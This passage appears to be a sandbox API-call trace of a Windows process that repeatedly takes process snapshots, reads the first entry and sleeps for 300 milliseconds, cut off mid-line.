Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.685] CloseHandle (hObject=0xc4) returned 1 [0149.685] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0149.689] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.809] CloseHandle (hObject=0xbc) returned 1 [0149.810] Sleep (dwMilliseconds=0x12c) [0150.113] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0150.118] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.156] CloseHandle (hObject=0xc4) returned 1 [0150.156] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0150.170] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.223] CloseHandle (hObject=0xbc) returned 1 [0150.223] Sleep (dwMilliseconds=0x12c) [0150.548] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0150.553] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.616] CloseHandle (hObject=0xc4) returned 1 [0150.616] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0150.623] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.687] CloseHandle (hObject=0xbc) returned 1 [0150.687] Sleep (dwMilliseconds=0x12c) [0151.033] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0151.040] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.147] CloseHandle (hObject=0xc4) returned 1 [0151.147] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0151.152] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.223] CloseHandle (hObject=0xbc) returned 1 [0151.223] Sleep (dwMilliseconds=0x12c) [0151.582] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0151.591] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.693] CloseHandle (hObject=0xc4) returned 1 [0151.694] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0151.700] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.834] CloseHandle (hObject=0xbc) returned 1 [0151.834] Sleep (dwMilliseconds=0x12c) [0152.211] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0152.217] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.345] CloseHandle (hObject=0xc4) returned 1 [0152.346] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0152.350] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.445] CloseHandle (hObject=0xbc) returned 1 [0152.445] Sleep (dwMilliseconds=0x12c) [0152.749] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0152.755] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.792] CloseHandle (hObject=0xc4) returned 1 [0152.792] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0152.834] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.964] CloseHandle (hObject=0xbc) returned 1 [0152.964] Sleep (dwMilliseconds=0x12c) [0153.266] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0153.271] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.334] CloseHandle (hObject=0xc4) returned 1 [0153.334] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0153.340] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.449] CloseHandle (hObject=0xbc) returned 1 [0153.449] Sleep (dwMilliseconds=0x12c) [0153.747] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0153.762] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.806] CloseHandle (hObject=0xc4) returned 1 [0153.806] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0153.812] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.893] CloseHandle (hObject=0xbc) returned 1 [0153.893] Sleep (dwMilliseconds=0x12c) [0154.230] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0154.236] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.301] CloseHandle (hObject=0xc4) returned 1 [0154.301] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0154.308] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.363] CloseHandle (hObject=0xbc) returned 1 [0154.363] Sleep (dwMilliseconds=0x12c) [0154.668] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0154.674] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.720] CloseHandle (hObject=0xc4) returned 1 [0154.720] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0154.724] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.763] CloseHandle (hObject=0xbc) returned 1 [0154.763] Sleep (dwMilliseconds=0x12c) [0155.111] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0155.116] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.161] CloseHandle (hObject=0xc4) returned 1 [0155.161] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0155.166] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.208] CloseHandle (hObject=0xbc) returned 1 [0155.208] Sleep (dwMilliseconds=0x12c) [0155.510] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0155.515] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.552] CloseHandle (hObject=0xc4) returned 1 [0155.552] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0155.557] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.597] CloseHandle (hObject=0xbc) returned 1 [0155.597] Sleep (dwMilliseconds=0x12c) [0155.947] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0155.953] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.051] CloseHandle (hObject=0xc4) returned 1 [0156.051] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0156.058] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.125] CloseHandle (hObject=0xbc) returned 1 [0156.125] Sleep (dwMilliseconds=0x12c) [0156.446] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0156.453] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.489] CloseHandle (hObject=0xc4) returned 1 [0156.489] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0156.498] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.536] CloseHandle (hObject=0xbc) returned 1 [0156.536] Sleep (dwMilliseconds=0x12c) [0156.836] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0156.843] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.913] CloseHandle (hObject=0xc4) returned 1 [0156.913] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0156.919] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.975] CloseHandle (hObject=0xbc) returned 1 [0156.975] Sleep (dwMilliseconds=0x12c) [0157.304] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0157.311] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.364] CloseHandle (hObject=0xc4) returned 1 [0157.364] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0157.369] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.433] CloseHandle (hObject=0xbc) returned 1 [0157.434] Sleep (dwMilliseconds=0x12c) [0157.756] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0157.762] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.854] CloseHandle (hObject=0xc4) returned 1 [0157.854] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0157.859] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.921] CloseHandle (hObject=0xbc) returned 1 [0157.921] Sleep (dwMilliseconds=0x12c) [0158.262] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0158.268] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.365] CloseHandle (hObject=0xc4) returned 1 [0158.365] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0158.371] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.439] CloseHandle (hObject=0xbc) returned 1 [0158.439] Sleep (dwMilliseconds=0x12c) [0158.817] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0158.824] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.863] CloseHandle (hObject=0xc4) returned 1 [0158.863] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0158.911] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.006] CloseHandle (hObject=0xbc) returned 1 [0159.006] Sleep (dwMilliseconds=0x12c) [0159.332] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0159.339] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.467] CloseHandle (hObject=0xc4) returned 1 [0159.467] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0159.520] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.575] CloseHandle (hObject=0xbc) returned 1 [0159.575] Sleep (dwMilliseconds=0x12c) [0160.138] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0160.157] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.239] CloseHandle (hObject=0xc4) returned 1 [0160.239] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0160.245] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.342] CloseHandle (hObject=0xbc) returned 1 [0160.343] Sleep (dwMilliseconds=0x12c) [0160.968] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0160.989] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.565] CloseHandle (hObject=0xc4) returned 1 [0161.565] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0161.573] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.655] CloseHandle (hObject=0xbc) returned 1 [0161.656] Sleep (dwMilliseconds=0x12c) [0161.955] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0161.961] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.075] CloseHandle (hObject=0xc4) returned 1 [0162.075] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0162.080] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.238] CloseHandle (hObject=0xbc) returned 1 [0162.238] Sleep (dwMilliseconds=0x12c) [0162.679] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0162.685] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.821] CloseHandle (hObject=0xc4) returned 1 [0162.821] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0162.828] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.948] CloseHandle (hObject=0xbc) returned 1 [0162.948] Sleep (dwMilliseconds=0x12c) [0163.282] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0163.287] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.206] CloseHandle (hObject=0xc4) returned 1 [0164.206] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0164.211] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.732] CloseHandle (hObject=0xbc) returned 1 [0165.732] Sleep (dwMilliseconds=0x12c) [0167.363] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0167.370] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.580] CloseHandle (hObject=0xc4) returned 1 [0167.580] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0167.587] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.779] CloseHandle (hObject=0xbc) returned 1 [0167.779] Sleep (dwMilliseconds=0x12c) [0168.615] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0168.622] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.899] CloseHandle (hObject=0xc4) returned 1 [0168.899] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0168.952] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.182] CloseHandle (hObject=0xbc) returned 1 [0169.182] Sleep (dwMilliseconds=0x12c) [0169.666] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 